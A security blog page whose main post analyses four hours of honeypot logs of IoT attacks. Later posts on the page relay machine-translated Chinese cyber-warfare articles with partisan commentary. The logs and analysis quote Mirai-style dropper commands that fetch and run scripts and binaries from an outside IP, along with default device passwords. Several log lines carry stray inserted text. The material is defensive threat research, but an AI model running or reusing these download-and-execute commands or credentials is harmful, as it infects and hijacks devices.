Beyond the firewall – 4 hours of recorded attacks against IOT devices

The graph below shows a distribution, by country, of the attacks seen by a laptop exposed to the open Internet for 4 hours on July 23, 2017.  TCP 23 (telnet) and TCP 1433 (MSSQL) were exposed and attack payloads directed against those services were recorded by honeypots running on those ports. All attacks are listed below together with a discussion of two particular IOT (Internet of Things)  attacks.

The laptop exposure was inadvertent and possibly related to Universal Plug and Play (UPNP) being enabled on the home router.  The laptop happened to be running an HPSS honeypoint agent with fake listeners on several common service ports. The agents send alerts to a central console that records information about the attack in a database and optionally writes to a log.  Those log entries are provided at the end of this post.

Here’s the net message:

Attacks against unsecured IOT devices are a reality – and they are happening right at the Internet boundary of your own home or business.

Do you have an IP-enabled home video camera or similar device?  See if it is on this list of devices known to be attacked:

https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack/

Note that events similar to those described below can – and do – happen within the firewall. See our previous post on the use of honeypots to detect the spread of malware within the private internal space of an organization.

If you are not already using some form of honeypot as part of your IDS strategy, consider doing so. They are normally quiet watchdogs – but when they do bark, there really is something going on you need to know about.

==> Oh.. and UPNP?  If that’s enabled on your home router, TURN IT OFF!

Netgear: http://netgear-us.custhelp.com/app/answers/detail/a_id/22686/~/how-to-disable-the-upnp-feature-on-your-netgear-router

Linksys: https://www.linksys.com/us/support-article?articleNum=135071

ASUS:  https://www.ghacks.net/2015/03/24/secure-you-wireless-router/


Here are the details of the attacks seen during that 4-hour window:

The sources of attacks were diverse by country of origin. The attacking systems were almost certainly compromised systems being used by the attackers without the owners awareness, although state-sponsored activity cannot be ruled out.

  • Here is one item of interest:

Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:43:02 Alert Data: sh#015#012cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.111 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.111; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.111 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *#015

  • The attacker IP (1.30.116.116 ) is registered in China/Mongolia.

inetnum: 1.24.0.0 – 1.31.255.255
netname: UNICOM-NM
descr: China unicom InnerMongolia province network

  • The attacker is attempting to cause the targeted victim machine to download and execute a shell script

wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh;

  • 185.165.29.111 – the source of the script – is an IP associated with Germany.

inetnum: 185.165.29.0 – 185.165.29.255
netname: AlmasHosting
country: DE

  • The few IP’s with reverse DNS in that /24 are associated with Iran (.ir domain).

host.mlsending.ir (185.165.29.58)
host.mlsender.ir (185.165.29.59)
host.madstoreml.ir (185.165.29.80)

  • Heckz.sh is associated with known malware

https://virustotal.com/en/file/5a5183c1f5fdab92e15f64f18c15a390717e313a9f049cd9de4fbb3f3adc4008/analysis/

  • The shell script – if successfully downloaded and executed , runs

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/mba; chmod +x mba; ./mba; rm -rf mba
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ebs; chmod +x ebs; ./ebs; rm -rf ebs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ew; chmod +x ew; ./ew; rm -rf ew
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/aw; chmod +x aw; ./aw; rm -rf aw
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ftr; chmod +x ftr; ./ftr; rm -rf ftr
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/er; chmod +x er; ./er; rm -rf er
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/re; chmod +x re; ./re; rm -rf re
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ty; chmod +x ty; ./ty; rm -rf ty
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ke; chmod +x ke; ./ke; rm -rf ke
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/as; chmod +x as; ./as; rm -rf as
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/fg; chmod +x fg; ./fg; rm -rf fg
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/sddf; chmod +x sddf; ./sddf; rm -rf sddf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/tel; chmod +x tel; ./tel; rm -rf tel

  • The “ew” program is known malware…..

https://virustotal.com/en/file/9685eeef4b7b25871f162d0050c9a9addbcba1df464e25cf3dce66f5653ebeca/analysis/

  • …and likely is associated with a variant of this botnet’s infrastructure:

https://en.wikipedia.org/wiki/Mirai_(malware)

  • Here’s another entry of interest

Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:57 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015

  • On the central console this shows as:

  • This is an attempted attack against a specific Chinese vendor’s (XiongMai Technologies) firmware using a login/password that is embedded in that firmware

https://krebsonsecurity.com/2016/10/europe-to-push-new-security-rules-amid-iot-mess/


Summary:

An unfortunate event, for sure. Still, the presence of honeypots on the targeted machine allowed us to capture real-world attack data and learn something of the reality of life beyond the firewall.  The Mirai botnet malware – and its variants – go from being something read about to something actually seen.

Always useful for understanding threats and planning meaningful defense.


The data:

Here are the raw log entries of attacks seen over the 4 hour exposure interval. The ones discussed above and some others of interest in bold.

Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:42:47 Alert Data: Connection Received
Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:43:02 Alert Data: sh#015#012cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.111 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.111; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.111 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *#015
Jul 23 19:43: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:43:55 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:43: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:43:56 Alert Data: Connection Received
Jul 23 19:45: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:45:36 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:46: hpoint-2371 received an alert from: 38.133.25.167 on port 23 at 2017-08-06 19:46:42 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:28 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:38 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:39 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:50 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:57: hpoint-2371 received an alert from: 70.79.76.209 on port 23 at 2017-08-06 19:57:21 Alert Data: Connection Received
Jul 23 20:00: hpoint-2371 received an alert from: 222.96.190.71 on port 23 at 2017-08-06 20:00:04 Alert Data: Connection Received
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:34 Alert Data: Connection ReceivedASUS:
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:34 Alert Data: Connection Received
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:53 Alert Data: root#015#01212345#015#012enable#015
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:56 Alert Data: root#015#01212345#015#012enable#015
Jul 23 20:08: hpoint-2371 received an alert from: 114.234.164.43 on port 23 at 2017-08-06 20:08:22 Alert Data: Connection Received
Jul 23 20:08: hpoint-2371 received an alert from: 114.234.164.43 on port 23 at 2017-08-06 20:08:44 Alert Data: root#015#012zlxx.#015#012enable#015
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:05 Alert Data: Connection Received
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:15 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:16 Alert Data: Connection Received
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:26 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:46: hpoint-2371 received an alert from: 103.253.183.107 on port 23 at 2017-08-06 20:46:31 Alert Data: Connection Received
Jul 23 20:48: hpoint-2371 received an alert from: 119.186.47.97 on port 23 at 2017-08-06 20:48:00 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:15 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at ASUS:2017-08-06 20:50:26 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:26 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:37 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 21:07: hpoint-2371 received an alert from: 113.53.91.152 on port 23 at 2017-08-06 21:07:14 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 192.249.135.180 on port 23 at 2017-08-06 21:12:15 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:53 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:57 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015
Jul 23 21:17: hpoint-2371 received an alert from: 177.7.234.203 on port 23 at 2017-08-06 21:17:51 Alert Data: Connection Received
Jul 23 21:18: hpoint-2371 received an alert from: 177.7.234.203 on port 23 at 2017-08-06 21:18:12 Alert Data: root#015#01212345#015#012enable#015
Jul 23 21:51: hpoint-2371 received an alert from: 85.56.128.151 on port 23 at 2017-08-06 21:51:06 Alert Data: Connection Received
Jul 23 21:54: hpoint-2371 received an alert from: 24.212.74.182 on port 23 at 2017-08-06 21:54:45 Alert Data: Connection Received
Jul 23 22:03: hpoint-2371 received an alert from: 200.101.92.79 on port 23 at 2017-08-06 22:03:35 Alert Data: Connection Received
Jul 23 22:03: hpoint-2371 received an alert from: 200.101.92.79 on port 23 at 2017-08-06 22:03:58 Alert Data: guest#015#01212345#015#012enable#015
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.201.182 on port 1433 at 2017-08-06 22:11:48 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.here’s the b201.182 on port 1433 at 2017-08-06 22:11:48 Alert Data: Connection Received
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.201.182 on port 1433 at 2017-08-06 22:11:59 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:20: hpoint-2371 received an alert from: 31.163.178.165 on port 23 at 2017-08-06 22:20:07 Alert Data: guest#015#012guest#015#012enable#015
Jul 23 22:27: hpoint-2371 received an alert from: 91.122.218.139 on port 23 at 2017-08-06 22:27:09 Alert Data: Connection Received
Jul 23 22:35: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:35:53 Alert Data: Connection Received
Jul 23 22:36: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:36:22 Alert Data: Connection Received
Jul 23 22:36: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:36:39 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:17 Alert Data: Connection Received
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:28 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:28 Alert Data: Connection Received
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:39 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:53: hpoint-2371 received an alert from: 187.160.67.74 on port 23 at 2017-08-06 22:53:36 Alert Data: Connection Received
Jul 23 22:54: hpoint-2371 received an alert from: 187.160.67.74 on port 23 at 2017-08-06 22:54:09 Alert Data: enable#015#012system#015#012shell#015#012sh#015#012cat /proc/mounts; /bin/busybox JBQVI#015
Jul 23 22:54: hpoint-2371 received an alert from: 36.239.158.149 on port 23 at 2017-08-06 22:54:19 Alert Data: Connection Received
Jul 23 22:54: hpoint-2371 received an alert from: 36.239.158.149 on port 23 at 2017-08-06 22:54:41 Alert Data: root#015#01212345#015#012enable#015
Jul 23 22:57: hpoint-2371 received an alert from: 70.89.64.58 on port 23 at 2017-08-06 22:57:35 Alert Data: Connection Received
Jul 23 22:57: hpoint-2371 received an alert from: 70.89.64.58 on port 23 at 2017-08-06 22:57:57 Alert Data: root#015#012xc3511#015#012enable#015
Jul 23 23:02: hpoint-2371 received an alert from: 97.107.83.42 on port 23 at 2017-08-06 23:02:28 Alert Data: Connection Received
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:30 Alert Data: Connection Received
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:40 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:44 Alert Data: Connection Received
Jul 23 23:19: hpoint-2371 received an alert from: 54.145.111.48 on port 443 at 2017-08-06 23:19:20 Alert Data: Connection Received
Jul 23 23:19: hpoint-2371 received an alert from: 54.145.111.48 on port 443 at 2017-08-06 ASUS:23:19:23 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 23:23: hpoint-2371 received an alert from: 109.96.99.66 on port 23 at 2017-08-06 23:23:37 Alert Data: Connection Received

China’s Report on US Military Cyber Troop Strength

(紅龍) Red Dragon’s statement: If you think you are paying too much for cyber threat intelligence and your current provider DID NOT SHOW this Chinese article to youthen you have paid too much for the incorrect type of Chinese Cyber Threat Intelligence…

Contact the Red Dragon (紅龍) @ MicroSolved, save money, stay better informed – find a capable cyber intelligence authority for less, much less….

whagestad@microsolved.com

謝謝您

紅龍

People’s Republic of China Report: U.S. network warfare unit’s equivalent to 7 over 8 million people equal to the 101st Airborne Division

At 08:49 on August 15, 2013 Source: Phoenix

Core Tip : According to Sing Tao Global Network reported that the U.S. share of global 29% of the number of hackers, the U.S. military about 3000-5000 information warfare experts, and 50000-70000 cyberwar soldiers, together with the original electronic warfare officer , the U.S. network warfare units should have eighty-eight thousand seven hundred people, the scale is equivalent to seven 101st Airborne Division, which will burden future wars weakened the enemy four into combat missions.

Phoenix August 14 “military observation room”, the following is the text Record:

Commentary: Snowdon event causes a foreign media speculation, in fact, the United States first established the largest network warfare units, the development of the world’s most advanced network warfare equipment, and bringing it to actual combat. Recently, the Sing Tao Global Network reported that the U.S. share of global 29% of the number of hackers, the U.S. military about 3000-5000 information warfare experts, and 50000-70000 cyberwar soldiers, together with the original electronic warfare officer, U.S. Army network warfare units should have eighty-eight thousand seven hundred people, the scale is equivalent to seven 101st Airborne Division, which will burden future wars to weaken the enemy four combat missions.

U.S. network army of four thousand people, the world’s top computer experts and hackers, including the CIA, NSA, FBI and other sector experts, all members of the average IQ of 140 or more, known as 140 troops from American four-star general Alexander lasted eight single-handedly built his independent command of the Tenth Fleet, including the Navy, the Air Force 24th Air Force and the Army Second Army, responsible for the training of the academic elite spy technology centers, as well as specialized eavesdropping embassies around the world special data collection center, the United States is being set up forty network security forces, including 13 as offensive forces, the main development network warfare weapons, another 27 troops mainly to protect DoD computer systems and data, all 40 teams will branch to be completed before the autumn of 2015.

“Military observation room” program broadcast in the Phoenix Chinese Channel ] [Program Area

Moderator: Dong Jiayao Moderator Zone]

First time: (Wednesday) 21:50-22:30

Playback time: (Thursday) 04:10-04:50,15:15-15:55

Statement : where marked “Phoenix” sources of work (text, audio, video), without the Phoenix authorization, any media, and individuals shall not be reproduced, link, posted or otherwise use; already authorized in writing by the webmaster at use must be marked “Source: Phoenix.” Violate the above statement, Ben Wang will pursue its legal responsibilities.

 美國網路戰部隊逾8萬人 相當於7101空降師20130815 08:49

來源:鳳凰衛視

核心提示:據星島環球網報道,美國駭客數量佔全球29%,美軍約有三千到五千名資訊戰專家,及五萬到七萬名網路戰兵,加上原有的電子戰人員,美軍網路戰部隊應該有八萬八千七百人,這個規模相當於七個101空降師,它在未來戰爭將負擔削弱敵人四成戰鬥力的任務。

鳳凰衛視8月14日《軍情觀察室》,以下為文字實錄:

解說:斯諾登事件引起中外媒體一輪炒作,其實美國最早建立規模最大的網路戰部隊,發展了世界最先進的網路戰裝備,並將其推向實戰。近日,星島環球網報道,美國駭客數量佔全球29%,美軍約有三千到五千名資訊戰專家,及五萬到七萬名網路戰兵,加上原有的電子戰人員,美軍網路戰部隊應該有八萬八千七百人,這個規模相當於七個101空降師,它在未來戰爭將負擔削弱敵人四成戰鬥力的任務。

美國網軍達四千人,由世界頂級電腦專家和駭客組成,包括中央情報局、國家安全局、聯邦調查局以及其他部門的專家,所有成員平均智商在140以上,稱為140部隊,由美國四星上將亞歷山大歷時八年一手打造,他獨立指揮權包括海軍第十艦隊,空軍第24航空隊以及陸軍第二軍,負責培訓間諜技術的學術精英中心,以及專門竊聽世界各國大使館的特殊數據收集中心,美國正在組建四十支網路安全部隊,其中13支為進攻性部隊,主要開發網路戰武器,另外27支部隊主要保護國防部的電腦系統和資料,所有40支部隊將於2015年秋季前全部建成。

《軍情觀察室》節目在鳳凰衛視中文臺播出【節目專區】

http://big5.ifeng.com/gate/big5/phtv.ifeng.com/program/jqgcs/

主持人:董嘉耀【主持人專區】

首播時間:(週三)21:50-22:30

重播時間:(週四)04:10-04:50,15:15-15:55

聲明:凡註明“鳳凰網”來源之作品(文字、音頻、視頻),未經鳳凰網授權,任何媒體和個人不得轉載、鏈結、轉貼或以其他方式使用;已經本網書面授權的,在使用時必須註明“來源:鳳凰網”。違反上述聲明的,本網將追究其相關法律責任。

 http://big5.ifeng.com/gate/big5/phtv.ifeng.com/program/jqgcs/detail_2013_08/15/28642074_0.shtml

US Concocting People’s War to Hype China Cyber Fears – FreeBeacon is Wrong…People’s Republic of China Rebuttal….

US Concocting People’s War to Hype China Cyber Fears – FreeBeacon is Wrong…People’s Republic of China Rebuttal….

http://world.huanqiu.com/exclusive/2013-08/4195091.html

U.S. media reports the magazine when the internal network fabricated Chinese people’s war planning

RedDragon’s Insight…there have been very few if any ‘cyber’ madness stories pointing the finger at the People’s Republic of China (中華人民共和國) since the traitorous Snowden left for Hong Kong and ended up in Russia working for the Soviet version of Facebook…This latest amplification by Gertz’ ‘Washington Free Bacon sorry Beacon…is yet another attempt by the unknowing and ignorant to cause controversy where there isn’t any…maybe the Free Bacon needs press, I expect the China hyperbole is the ticket..

Nonetheless, below is a story from within the People’s Republic of China indicating that Free Bacon is both incorrect (I wonder if Mr. Gertz speaks or understands Chinese or he is simply manufacturing a new enemy for the DIB?) and full of mis and dis- information…

The suggestion is to read the news story below and decide for yourself…having met with China’s Elite Hackers I can tell you they pout the trousers on one leg at a time just like we do….

                                                         Semper Fi –

                                                           謝謝您  紅龍

At 07:19 on August 1, 2013 Source: Global Times Author: Chen Chong Sun Micro Flow Limei Wang Xiaoxiong Roshan love Tu draft selection: Wei Zheng

  Original title: U.S. media reports the magazine when the internal planning cyber war concocted China

  LONDON August 1 message: “Chinese military theorists are the tactics of Mao’s peasant uprising to the United States for the next war,” U.S. “Washington Freedom Beacon” July 30 come to the surprising conclusion, is trying to set off another one pair of “Chinese cyber warfare,” the siege. However, the “Global Times” reporter found that the report mentioned in the article is not what the “internal defense report,” U.S. media’s most in-depth study of the U.S. cyber warfare theory originated from China just for grafted to the sensational.

  ”Washington Freedom Beacon” July 30 reported that China an internal defense report noted that China’s military is preparing for the cyber warfare, including the launch of the satellite from space attacks and the use of military and civil personnel initiating digital ” people’s war. ” The newspaper said the report, “Space Network warfare research,” the report by the Shanghai Research Center of a home defense drafted four engineers, including disclosure of Chinese cyber warfare and space warfare plans for further details, “This report makes the outside world a rare Beijing to peep into the most secret military projects: Future plans cyber warfare against the United States. ” The report concludes that, in the past, nuclear war strategy is based, but in the information age, with a strategic war should be cyber warfare. “Due to rely on information warfare in space, cyberspace will become a fight for control of the network hotspots.”

  ”China’s cyber warfare capabilities and anti-satellite missiles and interference projects, the PLA hide the deepest secrets. Held earlier this month in China-US Strategic and Economic Dialogue, the topic of cyber warfare by the U.S. and Chinese military defense officials instituted.” ” Washington Freedom Beacon “In reaching this conclusion, but re-claimed the newspaper received a copy of a translation of the report, marked above dates are December 2012, published in the” Aerospace Electronic Warfare “journal . The journal is the China Aerospace Science and Industry Group 8511 Nanjing Institute publications.

  ”Washington Freedom Beacon” really got China’s internal defense report yet? “Global Times” reporter July 31 telephone interview, “Aerospace Electronic Warfare” magazine. The magazine one person familiar with the situation told reporters, “Aerospace Electronic Warfare” is a publicly issued bimonthly, anyone want to see you can get this magazine, which is a little secret the contents of the article are not, let alone is the “internal defense report.” Specific to the thing I read entitled “Space Cyber ​​warfare research,” the article, by the Shanghai Institute of Satellite Engineering of Huanghan Wen and other four people to write, mainly for the Chinese readers “Space cyberwar” no unified concept, the lack of clear understanding of the U.S. space-related cyber warfare concepts, definitions introduced to China, is not what the Chinese military theorists in the study of people’s war in cyberspace.

  ”Global Times” reporter easily downloaded from the Internet this article. In the reporter seems more like a science article describes, beginning on several U.S. cites the definition of cyber warfare. Which describes the characteristics of cyber war, said: “Cyber ​​warfare is not limited to military personnel to participate, with the information systems expertise and skilled personnel, can be implemented cyber warfare, cyber warfare can be said to be a people’s war.”

  China National Innovation Strategy Research and Development Center for Strategic Studies cyberspace Renqin An 31, 2011, the “Global Times” said that the people’s war and cyber warfare irrelevant, network warfare is “elite war”, how could become the “People’s war “?

美媒把杂志当内部报告 编造中国筹划网络人民战争

【环球时报综合报道】“中国军方理论学者正在将毛泽东的农民起义战术用于未来对美战争”,美国《华盛顿自由灯塔报》7月30日得出的惊人结论,正试图掀起另一轮对“中国网络战”的围攻。然而,《环球时报》记者调查发现,文章中提到的报告根本不是什么“内部防务报告”,美国媒体把美国研究最深入的网络战理论嫁接到源于中国只是为了耸人听闻。

  《华盛顿自由灯塔报》7月30日报道称,中国一份内部防务报告指出,中国军方正在为网络战争做准备,其中包括从太空对卫星发起袭击,并利用军事和民间人员发起数字化的“人民战争”。该报称,这份名为“空间网络战研究”的报告由上海某家国防研究中心的4名工程师起草,其中披露了中国网络战和太空战计划的详细细节,“这份报告使得外界罕见地窥视到北京最为秘密的军事项目:未来针对美国的网络战计划”。这份报告认为,过去,战略战争是以核武器为基础,但在信息时代,具有战略意义的战争应该是网络战。“由于信息战要依赖于太空,网络空间将成为争夺网络控制权的热点。”

  “中国的网络战能力与反卫星导弹和干扰项目一样,是解放军隐藏最深的秘密。在本月初召开的中美战略与经济对话中,网络战的话题被美国和中国军事防务官员提起。”《华盛顿自由灯塔报》在得出这一结论时,却又转口声称,该报获得了这份报告的翻译件复印件,上面标注的日期是2012年12月,发表在《航天电子对抗》期刊上。这份期刊是中国航天科工集团南京8511研究所的出版物。

  《华盛顿自由灯塔报》真的搞到中国的内部防务报告了吗?《环球时报》记者7月31日电话采访了《航天电子对抗》杂志。该杂志一名熟悉情况的人士告诉记者,《航天电子对抗》是一份对外公开发行的双月刊,任何人只要想看就可以得到这份杂志,里面的文章一点涉密内容都没有,更不可能是“内部防务报告”。具体到那篇题为“空间赛博战研究”的文章,是由上海卫星工程研究所的黄汉文等4人写的,主要针对的是中国读者对“空间网络战”没有统一的概念,缺乏明确的认识,把美国有关空间网络战的概念、定义介绍给中国,根本不是什么中国军方理论家在研究网络空间的人民战争。

  《环球时报》记者轻易地从网上下载了这篇文章。在记者看来,文章更像是一篇科普介绍,开头就引用了几个美国对赛博战的定义。其中介绍赛博战特点时说:“赛博战并不限于军人参加,具备信息系统专门知识和技能的人员,都可以实施赛博战,可 以说赛博战是一种人民战争 。”

  中国国家创新与发展战略研究会网络空间战略研究中心主任秦安31日对《环球时报》说,人民战争与网络战风马牛不相及,网络战是“精英战”,怎么可能变成“人民战争”?

  【环球时报驻美国、英国特约记者 谌庄流  孙微 环球时报记者 屠丽美 王晓雄 罗山爱】

Chinese Information Warfare (IW) Doctrinal Development Circa 2005….

Good Day Chinese Cyber Conflict Fans…the following post about Chinese Information Warfare Doctrine as written by Lu Yong, Department of National Defense Strategy, 中國人民解放軍, 總參謀部..yes The People’s Liberation Army…circa 2005. This post was discovered by the Red Dragon a week ago and has already been removed from the web…sinister?

Here it is folks, a glimpse into Chinese Information Warfare Doctrinal Development in 2005…

“Information Warfare Challenges and Countermeasures For Executing the People’s War”

http://www.chinamil.com.cn/site1/zgmb/2005-08/18/content_148840.htm

 Lu Yong, Department of National Defense Strategy, 中國人民解放軍, 總參謀部

    People’s War is a traditional weapon to defeat the enemy army. Since the 90s of last century, with the world’s burgeoning revolution in military affairs, and high-tech weapons in the war widely used form of war started by the mechanized warfare to information warfare changes, “Information warfare is the major wars of the 21st century form “has become a consensus. In the semi-mechanized and mechanized warfare formed and developed the people’s war, and how to address information warfare challenges, how to continue in the information war play its unique advantages to ensure winning future possible war, is we are faced with a major theoretical issues and practical issues urgent. First, information warfare launched the people’s war is faced with severe challenges     (a) the purpose of information warfare, the limited size of the previous national war, the country is facing severe challenges the way to meet the enemy     since World War II, especially in the last century 80 years, the international situation has undergone major changes, “peace and development” instead of “war and revolution”, a theme of the times. Correspondingly, local war to replace the previous world wars and the full-scale war, become the world’s major warfare. We may face future information warfare, must be local wars, which makes the whole war, lasting way to defeat the enemy is facing severe challenges.    

 First, the purpose of information technology local wars, limited size, the possibility of universal war greatly reduced. Compared with the world wars and the full-scale war, information local war by political, economic, diplomatic and other factors more directly, the purpose of war is often limited to a certain political and economic goals, the scale of war is also controlled in a certain range. In this case, the state can not disrupt the overall national development strategic steps, the state transferred from peacetime “Everything for the front, everything for victory in the war,” the wartime regime, to mobilize all the people participate in the war.     Secondly, information warfare, the power of the warring parties is not primarily the number of competitions contest, but the quality of competition, the number of people’s war in the traditional pattern of strengths compensate for disadvantages quality hard work. In information warfare, weapons and equipment quality exists “Time difference” has been impossible to quantify the advantage to make the war directly to the performance of quality and efficiency, technology-intensive confrontation between elite standing army.

 Therefore, national mobilization, national war is neither necessary, nor can fundamentally change the balance of forces contrast.     Again, the limited capacity of information warfare battlefield, the war directly to the masses are severely constrained. Information warfare battlefield often limited to the parties directly within a certain depth, certain waters or airspace, such as the Anti-Japanese war the Japanese into my territory impossible to reproduce the situation, which makes the past that a large number of armed and unarmed masses to direct war Traditional methods are severely constrained, even though the war is also useless.     (Two) Information sudden outbreak of war increased, shortening the process of war, lasting defeat the enemy’s strategic facing severe challenges     in the past war, war lasted a relatively long time to carry out the people’s war, it is possible to mobilize the masses to participate in the war, give full play to the advantages of quantity, quality and quantity of weapons and equipment to make up for the disadvantages, to make up for military, material deficiencies, gradual change through sustained combat enemy forces, and ultimately win the war. This is the victory of people’s war past, the basic experience, but also from the other instructions, the traditional gathering of people’s war and the release force take a long time.    

Information warfare is one of the important features of the sudden outbreak of war increased, the process of shortening the war. Provoke a war party, in order to create a fait accompli and a more favorable situation, often with a sudden attack caught off guard the way to the other side to blow, and seeks to achieve a decisive victories in a short time. In addition, information warfare consumption increased dramatically, both sides are trying to combat a quick fix with little cost to achieve the purposes of war. In this case, change through sustained combat enemy forces greatly reduces the possibility. Therefore, the information warfare conduct civil wars, not only faced with how to release in a short test of the people’s war Weili, and the possibility of lasting defeat the enemy becomes negligible.     (Three) high-tech information warfare, and more in the sparsely populated border and coastal areas as well as sea and air for the masses traditional way of war frontline facing serious challenges     in the past war, a large scale because of the war and the relatively tech weaponry low, logistical and equipment support technical requirements are not high, coupled with the war mainly on land, ordinary people will be able to directly participate in a little training operations, delivering supplies to the front or to the way frontline. Therefore, human and human frontline war is war frontline people’s traditional way of war.    

